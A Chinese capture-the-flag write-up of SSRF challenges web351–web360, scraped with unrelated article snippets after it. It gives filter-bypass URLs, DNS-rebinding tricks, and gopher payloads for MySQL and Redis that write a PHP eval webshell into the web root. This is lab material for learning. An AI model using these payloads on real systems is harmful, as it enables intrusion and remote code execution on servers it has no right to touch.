双层小牛堡
双层小牛堡

CTFHUB SSRF

目录

web351

​编辑 web352

web353

web354  sudo.cc 代表 127        

web355  host长度

web356

web357 DNS 重定向

 web358 @bypass

web359  mysql ssrf

web360

web351

POST查看 flag.php即可

CTFHUB SSRF_第1张图片

CTFHUB SSRF_第2张图片 web352

我们看看 过滤了 localhost 和 127.0.0.1

并且需要存在 http

所以我们传入payload

url=http://0177.0.0.1/flag.php

这里是 八进制的 127

web353

过滤了 127.0.0.1

我们可以通过 0 来绕过

payload

url=http://0/flag.php

web354  sudo.cc 代表 127        

  0 1 127 都被过滤了

这里确实学到了

http://sudo.cc 指向的 就是 127.0.0.1

我们直接使用这个payload

http://sudo.cc/flag.php

web355  host长度

没有过滤 但是 host需要为 小于5

payload

url=http://0/flag.php

 看wp还存在一个解法

http://127.1/flag.php

web356

  hacker

长度小于3

这里只能使用

http://0/flag.php

web357 DNS 重定向

我们这里首先会判断 是不是 私有ip

这样 我们之前的数字ip bypass就是失效了

这里我们可以使用DNS 重定向 bypass

rbndr.us dns rebinding service

CTFHUB SSRF_第3张图片

 这里设置一个不是私有的ip

url=http://7f000001.774bd96d.rbndr.us/flag.php

CTFHUB SSRF_第4张图片

 web358 @bypass

这里需要出现 这内容 才会输出

我们来看看

我们通过 @ 来绕过

http://[email protected]/flag.php?show

这里 @ 后 还是解析为 127.0.0.1 并且结尾是 show

web359  mysql ssrf

首先开局一个登录

我们看看源代码

CTFHUB SSRF_第5张图片

发现有一个 hidden 元素 这里是被隐藏了 并且值已经设定为 url 了 这里要敏感了 因为 SSRF 就是引用其他url

我们随便写一个抓包看看

CTFHUB SSRF_第6张图片

发现 POST内容中 传递了 returl值

我们修改为百度看看

CTFHUB SSRF_第7张图片

确实存在 ssrf

没有找到 flag.php

我们因为通过登入 我们可以想到数据库 那我们直接通过 gopher 攻击mysql即可

我们使用工具

py2 .\gopherus.py --exploit mysql

CTFHUB SSRF_第8张图片

 将 payload 再进行一次 url编码

gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254f%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2527%2563%256d%2564%2527%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2573%2568%2565%256c%256c%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501

然后进行传递

CTFHUB SSRF_第9张图片

然后通过蚁剑链接即可

web360

找不到 flag.php

我们开始通过 dict 探测端口

url=dict://127.0.0.1:80

CTFHUB SSRF_第10张图片

 发现开放了 6379端口 这里是 redis的端口 这里很明显就是让我们攻击了

我们一样去 工具实现攻击

CTFHUB SSRF_第11张图片

gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252431%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2540%2524_POST%255Bcmd%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A/var/www/html%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

总的来说 show的ssrf 还挺简单的 这里学到了 sudo.cc的内容

你可能感兴趣的:(WEB,ssrf)

  • WebView 嵌套页面调试指南:解决上下文丢失与状态失效问题 2501_91600889 httpudphttpswebsocket网络安全网络协议tcp/ip
    在移动Web开发中,嵌套iframe、多Tab页、多页面状态共享已是常见模式。尤其是在App中用WebView加载这些页面时,调试常常遇到一个隐形难题:状态丢失、数据不一致或逻辑错乱。比如点击跳转后上一页状态失效,iframe内页面切换时context混乱,或者多页签之间数据传递失败。此类问题在浏览器中难以复现,在WebView环境下尤为常见。这篇文章记录一次我们团队在调试“多页面嵌套+用户状态同
  • 深入浅出:AWS Cognito 认证机制详解 运维开发王义杰 信息安全系统运维awsaws云计算
    在当今的互联网应用中,用户认证和管理是不可或缺的一环。无论是Web应用还是移动App,都需要一套安全、可靠且易于扩展的认证系统。AWSCognito正是亚马逊云科技(AWS)提供的一项强大服务,旨在简化用户身份验证、授权和用户管理流程。作为一名科技博主,今天我将带大家深入了解Cognito的认证机制,并通过具体示例和实用建议,助大家轻松构建安全的应用。Cognito核心概念:用户池(UserPoo
  • 【Spring AI】 1接入 Ollama实践 占星安啦 springaijavaspringaiollama
    SpringAI接入Ollama实践学习笔记Ollama官方文档SpringAI快速开始SpringAIOllama集成文档1.pom.xml依赖配置前置条件:请确保你已安装好Java17+、Maven、Ollama,并已下载好所需大模型。在pom.xml中添加SpringAI及Ollama相关依赖:org.springframework.bootspring-boot-starter-webor
  • WEB攻防-Java安全&JNDI&RMI&LDAP&五大不安全组件&RCE执行&不出网 教IT的小强 前端java安全
    #知识点:1、Java安全-RCE执行-5大类函数调用2、Java安全-JNDI注入-RMI&LDAP&高版本3、Java安全-不安全组件(框架)-Shiro&FastJson&Jackson&XStream&Log4j一、演示案例-Java安全-RCE执行-5大类函数调用1、GroovyExec![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/38c
  • Cookie:Web 开发中的身份认证与数据存储利器 前端小巷子 网络相关前端服务器网络面试开发语言
    在Web开发中,Cookie是一个不可或缺的概念。它不仅用于身份认证,还用于存储用户偏好设置、会话信息等。本文将详细介绍Cookie的原理、组成、设置方法以及在实际开发中的应用。一、什么是Cookie?Cookie是一种存储在用户浏览器中的小型文本文件,用于存储用户会话信息。每个Cookie都有一个名称和一个值,通常由服务器在响应中设置,并由浏览器存储在用户的设备上。Cookie的主要用途是跟踪用
  • 服务端渲染SSR:原理、实践与未来趋势 GISer_Jinger 前端javascriptvue.js
    深入解析服务器端渲染(SSR):原理、实践与未来趋势在当今追求极致用户体验的Web开发领域,服务器端渲染(SSR)已成为解决性能与SEO难题的关键技术。本文将带你深入理解SSR的核心机制、应用场景及前沿实践。一、SSR的本质与工作原理SSR(Server-SideRendering)指在服务器端生成完整HTML页面并发送至浏览器的技术。与客户端渲染(CSR)不同,SSR的核心流程如下:请求解析:用
  • Flask + GPT 实践 红鼻子时代 flask项目flaskgptpython
    一、前言本篇文章会介绍从零开始构建一个基于Flask+GPT的小项目的过程。总共有四个版本的迭代,包括:1、调用GPT接口并渲染到前端页面;2、使用Flask提供的session来实现登录和登出功能;3、用SQLAlchemy管理数据库,实现用户注册和登录;4、记录和分页查看用户与GPT的对话历史。二、项目环境与依赖Python版本:建议3.7+Flask:最常用的PythonWeb框架之一ope
  • 近百万奖金!2024 Web3.0 创新大赛重磅来袭! DataFountain数据科学 web3数据竞赛大数据人工智能
    10月30日,中国互联网协会与香港Web3.0协会共同组织举办的2024Web3.0创新大赛在上海举行启动会,宣布大赛正式在DataFountain竞赛平台(简称DF平台,http://www.datafountain.cn)启动上线。大赛面向社会各界征集参赛团队,不限年龄、国籍,高校、科研院所、企业人员均可参赛!两大赛区,六大赛道,近百万奖金,你不来吗:https://www.datafount
  • Web3.0 技术应用溯源系统建设 天机️灵韵 区块链区块链web3.0
    Web3.0技术与溯源(TrackandTrace)的结合,是区块链等去中心化技术在实际应用中的典型场景之一。通过Web3.0的底层技术,可以构建透明、不可篡改且可验证的溯源系统,解决传统供应链、商品流通等领域的数据信任问题。以下是两者的深度关联与具体应用:一、Web3.0如何赋能溯源?区块链的不可篡改性核心机制:区块链通过哈希链、共识算法(如PoW/PoS)确保数据一旦上链,无法被单一方修改或删
  • Spring Security 鉴权与授权详解(前后端分离项目)
    前言在现代Web开发中,前后端分离架构已经成为主流。后端专注于提供RESTfulAPI,而前端通过AJAX请求与后端交互。在这种架构下,如何对用户进行认证(Authentication)和授权(Authorization)成为了系统设计中的核心问题。SpringSecurity是Spring框架中用于构建安全系统的模块,它不仅提供了强大的安全机制,还支持灵活的自定义配置。本文将围绕鉴权失败和成功时
  • 【自动化测试】Pytest的必会技巧 —— pytest setup和teardown 程序员 小濠 自动化测试实战pytest测试用例自动化测试测试工程师测试工具
    pytestsetup和teardown我们在使用selenium执行web自动化测试的时候,当我们需要执行多条测试用例时,执行一条用例就启动一次浏览器显然效率就太低了,我们需要一次启动浏览器,执行多条用例。pytest可以满足我们的需求吗?答案是pytest的setup和teardown完美匹配我们的需求,unittest有的它有,unittest没有的它也有!作用范围模块级(setup_mod
  • SpringMVC实战:从配置到JSON处理全解析 Cyanto SpringMVCspringjava
    目录项目概述核心配置文件解析web.xml配置springmvc.xml配置控制器详解基本控制器示例请求处理方式获取请求参数返回JSON数据请求转发重定向视图解析与页面跳转项目结构说明关键知识点总结项目概述这是一个基于SpringMVC的Web应用示例,展示了如何配置SpringMVC环境、创建控制器以及处理不同类型的请求和响应。项目包含了以下核心功能:基本页面跳转请求参数处理JSON数据返回请求
  • 为什么要学习 next.js 框架 + Vercel 部署平台,因为我想把自己的 app 分享给别人。 waterHBO 学习javascript开发语言
    前端开发太卷?不如给你的React换个“豪华座驾”和“F1赛道”**如果你像我一样,从create-react-app的时代一路走来,你一定经历过那种“甜蜜的烦恼”:React给了你一个超强的V8引擎,但造车剩下的所有事——从方向盘(路由)、底盘(项目结构)到导航系统(数据管理)——都得你自己撸。结果就是,每个项目开始前,你都在重复发明轮子,在Webpack的配置地狱里苦苦挣扎。好消息是,时代变了
  • Django ORM 2. 模型(Model)操作 博观而约取 djangopython后端
    1.数据准备本文后续所有ORM操作将通过提供通用的测试数据进行演示:定义6个模型(覆盖字段类型、关系类型、查询、聚合、注解等场景)关于创建模型请参考上一节:DjangoORM1.创建模型(Model)使用Django离线脚本批量生成各模型测试数据模型定义在测试app(假如app名为web)下的models.py(web/models.py)中添加如下6个模型:fromdjango.dbimport
  • GitHub 趋势日报 (2025年06月26日) qianmoQ GitHub项目趋势日报(2025年)github
    由TrendForge系统生成|https://trendforge.devlive.org/本日报中的项目描述已自动翻译为中文今日获星趋势图今日获星趋势图716free-for-dev677Self-Hosting-Guide618Best-websites-a-programmer-should-visit565dioxus411edit337awesome-mcp-servers310lea
  • GitHub 趋势日报 (2025年06月25日) qianmoQ GitHub项目趋势日报(2025年)github
    由TrendForge系统生成|https://trendforge.devlive.org/本日报中的项目描述已自动翻译为中文今日获星趋势图今日获星趋势图880awesome788build-your-own-x691free-for-dev427best-of-ml-python404Self-Hosting-Guide403Best-websites-a-programmer-should-
  • html制作一个简单的表单 Gin387 html前端javascript
    表单输入练习申请表姓名感兴趣的职位:web设计师web开发着web管理者其他需求:阅读确认信息经验无经验1年2年3年其中,input有很多text,radio(单选),checkbox(多选)其中的绑定关系
  • python读mongodb很慢_Python3.5+Mongodb+Flask Web实战坑点小结【Dog Plus】 weixin_39604685
    我不是程序员,也不是设计师,我只是碰巧有一些想法和一台电脑。Iamnotadesignernoracoder.I'mjustaguywithapoint-of-viewandacomputer.写在前言前:第一个WEB部署完毕,觉得有必要做一个小结:开发平台及工具:Win10+Pycharm+Py3.5+Flask+Mongodb回头看看,一旦选择这样的套装就注定要有很多坑来填。建议后来者能用Li
  • SOAP和WSDL和web服务三者的关系
    SOAP(简单对象访问协议)、WSDL(Web服务描述语言)以及Web服务三者构成了一个紧密相连的技术栈,它们共同作用以支持分布式应用程序之间的互操作性。为了更深入地理解这三者之间的关系,我们可以从定义、功能角色及其在实际应用中的互动来探讨。定义Web服务:这是一种软件系统设计模式,旨在通过网络提供某些功能给其他软件或最终用户使用。它允许不同平台上的应用程序通过标准化的接口相互通信,从而实现跨平台
  • ThinkPHP框架深入解析与实战技巧 weixin_42613017
    本文还有配套的精品资源,点击获取简介:《深入理解ThinkPHP框架》一文深入探讨了ThinkPHP这一广泛使用的PHPWeb开发框架。文章详细阐述了ThinkPHP的核心概念、设计模式、主要特点以及核心组件。此外,还提供了基于ThinkPHP的开发实践案例,包括常见应用场景、开发流程以及进阶话题,如模块化开发、错误处理、RESTfulAPI实现和调试工具的使用。读者将通过本文全面学习到如何高效运
  • 一种文档与代码双轨处理的RAG架构方案 木鱼时刻 大模型人工智能深度学习
    1.目标如何构建一个能同时高效处理文档和代码的RAG系统?本文提出的融合架构,旨在解决这一核心挑战。2.整体架构概览该系统的顶层设计思想是专业分工,统一调度。它将复杂的知识处理流程拆解为清晰的模块,各模块各司其职,最终由一个核心服务进行统一编排。+-------------------+|前端||(DifyWeb界面)|+-------------------+|+----------------
  • 史上最全的CTF保姆教程 从入门到入狱【带工具】 最爱吃南瓜 网络安全web安全windows
    下面分享的资源包含国内9套教程教程1-CTF从入门到提升四周学习视频教程教程2-信息安全CTF比赛培训教程教程3-CTF从入门到提升教程4-CTF培训web网络安全基础入门渗透测试教程教程5-CTF入门课程教程6-CTF夺旗全套视频教程教程7-网络安全课程新手入门必看教程8-bugku_CTF_Web视频教程网络安全预科班课程CTF入门国外3套教程国外教程1套-GoogleCTF2018Begin
  • 基于SpringBoot文件管理系统中的分片上传实现
    分片上传一、引言现代Web应用中,大文件上传是一个常见需求。传统单文件上传方式在网络不稳定或文件过大时存在诸多问题。分片上传技术通过将大文件分割为小块进行传输,完美解决了大文件上传的痛点。本文将深入探讨分片上传的核心实现方案。二、功能概述分片上传功能用于处理大文件上传,支持断点续传、MD5校验秒传和并发上传,核心特点包括:断点续传:通过记录已上传分片,支持中断后继续上传秒传功能:基于文件MD5值实
  • 什么是WebAssembly(WASM) MonkeyKing.sun wasm区块链
    WebAssembly(WASM)是一种高性能的低级编程语言字节码格式,可在网页和非网页环境中运行,支持多语言编译,运行速度接近原生代码。它在区块链中的作用是:作为智能合约的执行引擎,被多条非以太坊链(如Polkadot、EOS、CosmWasm)采用。Polkadot和EOS是使用WebAssembly的两个代表性区块链平台,它们与Solidity+EVM(以太坊生态)形成鲜明对比。一、什么是W
  • JavaScript深入理解与实战:作业6详解 红廉骑士兽
    本文还有配套的精品资源,点击获取简介:本次作业深入探讨了JavaScript编程语言的基础语法、函数与闭包、对象与原型链、事件与DOM操作、异步编程、ES6新特性、框架与库的使用、性能优化以及调试与测试。JavaScript在Web开发中扮演关键角色,通过学习上述知识点,学生将能够提升Web应用开发技能,优化代码性能,并进行有效的代码调试与测试。1.JavaScript基础语法介绍与实战1.1Ja
  • HtmlEx:HTML高级开发与实战指南 浮华ya
    本文还有配套的精品资源,点击获取简介:HTML是创建网页的基础,而"HtmlEx"项目旨在提升开发者的HTML技能。内容包括HTML5新特性,CSS和JavaScript的深入集成,表单元素的使用和验证,多媒体支持,Web组件,SEO优化,无障碍性实践,HTML模板语言使用,以及与后端框架的集成。通过实践讲解,让开发者在网页开发中更加得心应手。1.HTML基本结构与元素1.1HTML文档结构解析H
  • python web django 小项目简书_Django3.0起步,第一个小项目 weixin_39712455 pythonwebdjango小项目简书
    #Django_start第一个django起步小项目,新建django项目,配置mysql,sql语句操作,MVT基本操作。###1.起步```pip3--default-timeout=1000000installdjango```cd到项目目录,创建项目```django-adminstartproject项目名称```如果找不到django路径,尝试```python3/Users/zha
  • The Django Book-----第一章:介绍Django 日常发霉 DjangoDjango
    第一章:介绍Django本书所讲的是Django:一个可以使Web开发工作愉快并且高效的Web开发框架。使用Django,使你能够以最小的代价构建和维护高质量的Web应用。从好的方面来看,Web开发激动人心且富于创造性;从另一面来看,它却是份繁琐而令人生厌的工作。通过减少重复的代码,Django使你能够专注于Web应用上有趣的关键性的东西。为了达到这个目标,Django提供了通用Web开发模式的高
  • linux替换war包中的文件,Linux zip与unzip命令:替换war包中的某个文件 祝峰 linux替换war包中的文件
    原本,想用jar命令来快速替换war包的文件的,可是,发现Ubuntu中没有装Java,懒癌发做,遂使用zip与unzip命令代替。appzip:压缩命令ide格式:zip[-选项]*.war要压缩的文件例子:zip-mapp.war/WEB-INF/classes/com/app/business/service/platform/impl/abc.classspa选项:orm-m:不检查而替换
  • 功能测试包含哪些测试?分别有什么作用? 可可爱爱的程序员 功能测试软件测试测试理论功能测试python单元测试程序人生
    功能测试包含哪些测试?功能测试主要包括链接测试、表单测试、搜索测试、删除测试、cookies、session测试、数据库测试等部分。功能测试对产品的各功能进行验证,根据功能测试用例,逐项测试,检查产品是否达到用户要求的功能。功能测试包含哪些测试?分别有什么作用?接下来我们具体了解一下:一、链接测试测试所有链接是否按指示的那样确实链接到了该链接的页面;测试所链接的页面是否存在;测试web应用系统上没
  • HQL之投影查询 归来朝歌 HQLHibernate查询语句投影查询
            在HQL查询中,常常面临这样一个场景,对于多表查询,是要将一个表的对象查出来还是要只需要每个表中的几个字段,最后放在一起显示? 针对上面的场景,如果需要将一个对象查出来: HQL语句写“from 对象”即可 Session session = HibernateUtil.openSession();
  • Spring整合redis bylijinnan redis
    pom.xml <dependencies> <!-- Spring Data - Redis Library --> <dependency> <groupId>org.springframework.data</groupId> <artifactId>spring-data-redi
  • org.hibernate.NonUniqueResultException: query did not return a unique result: 2 0624chenhong Hibernate
    参考:http://blog.csdn.net/qingfeilee/article/details/7052736 org.hibernate.NonUniqueResultException: query did not return a unique result: 2         在项目中出现了org.hiber
  • android动画效果 不懂事的小屁孩 android动画
    前几天弄alertdialog和popupwindow的时候,用到了android的动画效果,今天专门研究了一下关于android的动画效果,列出来,方便以后使用。 Android 平台提供了两类动画。 一类是Tween动画,就是对场景里的对象不断的进行图像变化来产生动画效果(旋转、平移、放缩和渐变)。 第二类就是 Frame动画,即顺序的播放事先做好的图像,与gif图片原理类似。
  • js delete 删除机理以及它的内存泄露问题的解决方案 换个号韩国红果果 JavaScript
    delete删除属性时只是解除了属性与对象的绑定,故当属性值为一个对象时,删除时会造成内存泄露  (其实还未删除) 举例: var person={name:{firstname:'bob'}} var p=person.name delete person.name p.firstname -->'bob' // 依然可以访问p.firstname,存在内存泄露
  • Oracle将零干预分析加入网络即服务计划 蓝儿唯美 oracle
    由Oracle通信技术部门主导的演示项目并没有在本月较早前法国南斯举行的行业集团TM论坛大会中获得嘉奖。但是,Oracle通信官员解雇致力于打造一个支持零干预分配和编制功能的网络即服务(NaaS)平台,帮助企业以更灵活和更适合云的方式实现通信服务提供商(CSP)的连接产品。这个Oracle主导的项目属于TM Forum Live!活动上展示的Catalyst计划的19个项目之一。Catalyst计
  • spring学习——springmvc(二) a-john springMVC
    Spring MVC提供了非常方便的文件上传功能。 1,配置Spring支持文件上传: DispatcherServlet本身并不知道如何处理multipart的表单数据,需要一个multipart解析器把POST请求的multipart数据中抽取出来,这样DispatcherServlet就能将其传递给我们的控制器了。为了在Spring中注册multipart解析器,需要声明一个实现了Mul
  • POJ-2828-Buy Tickets aijuans ACM_POJ
    POJ-2828-Buy Tickets http://poj.org/problem?id=2828 线段树,逆序插入 #include<iostream>#include<cstdio>#include<cstring>#include<cstdlib>using namespace std;#define N 200010struct
  • Java Ant build.xml详解 asia007 build.xml
    1,什么是antant是构建工具2,什么是构建概念到处可查到,形象来说,你要把代码从某个地方拿来,编译,再拷贝到某个地方去等等操作,当然不仅与此,但是主要用来干这个3,ant的好处跨平台   --因为ant是使用java实现的,所以它跨平台使用简单--与ant的兄弟make比起来语法清晰--同样是和make相比功能强大--ant能做的事情很多,可能你用了很久,你仍然不知道它能有
  • android按钮监听器的四种技术 百合不是茶 androidxml配置监听器实现接口
    android开发中经常会用到各种各样的监听器,android监听器的写法与java又有不同的地方;    1,activity中使用内部类实现接口 ,创建内部类实例  使用add方法  与java类似   创建监听器的实例 myLis lis = new myLis();   使用add方法给按钮添加监听器  
  • 软件架构师不等同于资深程序员 bijian1013 程序员架构师架构设计
            本文的作者Armel Nene是ETAPIX Global公司的首席架构师,他居住在伦敦,他参与过的开源项目包括 Apache Lucene,,Apache Nutch, Liferay 和 Pentaho等。         如今很多的公司
  • TeamForge Wiki Syntax & CollabNet User Information Center sunjing TeamForgeHow doAttachementAnchorWiki Syntax
    the CollabNet user information center http://help.collab.net/   How do I create a new Wiki page? A CollabNet TeamForge project can have any number of Wiki pages. All Wiki pages are linked, and
  • 【Redis四】Redis数据类型 bit1129 redis
    概述 Redis是一个高性能的数据结构服务器,称之为数据结构服务器的原因是,它提供了丰富的数据类型以满足不同的应用场景,本文对Redis的数据类型以及对这些类型可能的操作进行总结。 Redis常用的数据类型包括string、set、list、hash以及sorted set.Redis本身是K/V系统,这里的数据类型指的是value的类型,而不是key的类型,key的类型只有一种即string
  • SSH2整合-附源码 白糖_ eclipsespringtomcatHibernateGoogle
    今天用eclipse终于整合出了struts2+hibernate+spring框架。 我创建的是tomcat项目,需要有tomcat插件。导入项目以后,鼠标右键选择属性,然后再找到“tomcat”项,勾选一下“Is a tomcat project”即可。具体方法见源码里的jsp图片,sql也在源码里。     补充1:项目中部分jar包不是最新版的,可能导
  • [转]开源项目代码的学习方法 braveCS 学习方法
    转自: http://blog.sina.com.cn/s/blog_693458530100lk5m.html http://www.cnblogs.com/west-link/archive/2011/06/07/2074466.html   1)阅读features。以此来搞清楚该项目有哪些特性2)思考。想想如果自己来做有这些features的项目该如何构架3)下载并安装d
  • 编程之美-子数组的最大和(二维) bylijinnan 编程之美
    package beautyOfCoding; import java.util.Arrays; import java.util.Random; public class MaxSubArraySum2 { /** * 编程之美 子数组之和的最大值(二维) */ private static final int ROW = 5; private stat
  • 读书笔记-3 chengxuyuancsdn jquery笔记resultMap配置ibatis一对多配置
    1、resultMap配置 2、ibatis一对多配置 3、jquery笔记 1、resultMap配置 当<select resultMap="topic_data"> <resultMap id="topic_data">必须一一对应。 (1)<resultMap class="tblTopic&q
  • [物理与天文]物理学新进展 comsci
          如果我们必须获得某种地球上没有的矿石,才能够进行某些能量输出装置的设计和建造,而要获得这种矿石,又必须首先进行深空探测,而要进行深空探测,又必须获得这种能量输出装置,这个矛盾的循环,会导致地球联盟在与宇宙文明建立关系的时候,陷入困境       怎么办呢?  
  • Oracle 11g新特性:Automatic Diagnostic Repository daizj oracleADR
    Oracle Database 11g的FDI(Fault Diagnosability Infrastructure)是自动化诊断方面的又一增强。 FDI的一个关键组件是自动诊断库(Automatic Diagnostic Repository-ADR)。 在oracle 11g中,alert文件的信息是以xml的文件格式存在的,另外提供了普通文本格式的alert文件。 这两份log文
  • 简单排序:选择排序 dieslrae 选择排序
    public void selectSort(int[] array){ int select; for(int i=0;i<array.length;i++){ select = i; for(int k=i+1;k<array.leng
  • C语言学习六指针的经典程序,互换两个数字 dcj3sjt126com c
    示例程序,swap_1和swap_2都是错误的,推理从1开始推到2,2没完成,推到3就完成了 # include <stdio.h> void swap_1(int, int); void swap_2(int *, int *); void swap_3(int *, int *); int main(void) { int a = 3; int b =
  • php 5.4中php-fpm 的重启、终止操作命令 dcj3sjt126com PHP
    php 5.4中php-fpm 的重启、终止操作命令: 查看php运行目录命令:which php/usr/bin/php 查看php-fpm进程数:ps aux | grep -c php-fpm 查看运行内存/usr/bin/php  -i|grep mem 重启php-fpm/etc/init.d/php-fpm restart 在phpinfo()输出内容可以看到php
  • 线程同步工具类 shuizhaosi888 同步工具类
    同步工具类包括信号量(Semaphore)、栅栏(barrier)、闭锁(CountDownLatch)   闭锁(CountDownLatch) public class RunMain { public long timeTasks(int nThreads, final Runnable task) throws InterruptedException { fin
  • bleeding edge是什么意思 haojinghua DI
    不止一次,看到很多讲技术的文章里面出现过这个词语。今天终于弄懂了——通过朋友给的浏览软件,上了wiki。  我再一次感到,没有辞典能像WiKi一样,给出这样体贴人心、一清二楚的解释了。为了表达我对WiKi的喜爱,只好在此一一中英对照,给大家上次课。   In computer science, bleeding edge is a term that
  • c中实现utf8和gbk的互转 jimmee ciconvutf8&gbk编码
    #include <iconv.h> #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <string.h> #include <sys/stat.h> int code_c
  • 大型分布式网站架构设计与实践 lilin530 应用服务器搜索引擎
    1.大型网站软件系统的特点? a.高并发,大流量。 b.高可用。 c.海量数据。 d.用户分布广泛,网络情况复杂。 e.安全环境恶劣。 f.需求快速变更,发布频繁。 g.渐进式发展。 2.大型网站架构演化发展历程? a.初始阶段的网站架构。 应用程序,数据库,文件等所有的资源都在一台服务器上。 b.应用服务器和数据服务器分离。 c.使用缓存改善网站性能。 d.使用应用
  • 在代码中获取Android theme中的attr属性值 OliveExcel androidtheme
    Android的Theme是由各种attr组合而成, 每个attr对应了这个属性的一个引用, 这个引用又可以是各种东西.   在某些情况下, 我们需要获取非自定义的主题下某个属性的内容 (比如拿到系统默认的配色colorAccent), 操作方式举例一则: int defaultColor = 0xFF000000; int[] attrsArray = { andorid.r.
  • 基于Zookeeper的分布式共享锁 roadrunners zookeeper分布式共享锁
    首先,说说我们的场景,订单服务是做成集群的,当两个以上结点同时收到一个相同订单的创建指令,这时并发就产生了,系统就会重复创建订单。等等......场景。这时,分布式共享锁就闪亮登场了。   共享锁在同一个进程中是很容易实现的,但在跨进程或者在不同Server之间就不好实现了。Zookeeper就很容易实现。具体的实现原理官网和其它网站也有翻译,这里就不在赘述了。   官
  • 两个容易被忽略的MySQL知识 tomcat_oracle mysql
    1、varchar(5)可以存储多少个汉字,多少个字母数字?   相信有好多人应该跟我一样,对这个已经很熟悉了,根据经验我们能很快的做出决定,比如说用varchar(200)去存储url等等,但是,即使你用了很多次也很熟悉了,也有可能对上面的问题做出错误的回答。   这个问题我查了好多资料,有的人说是可以存储5个字符,2.5个汉字(每个汉字占用两个字节的话),有的人说这个要区分版本,5.0
  • zoj 3827 Information Entropy(水题) 阿尔萨斯 format
    题目链接:zoj 3827 Information Entropy 题目大意:三种底,计算和。 解题思路:调用库函数就可以直接算了,不过要注意Pi = 0的时候,不过它题目里居然也讲了。。。limp→0+plogb(p)=0,因为p是logp的高阶。 #include <cstdio> #include <cstring> #include <cmath&
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他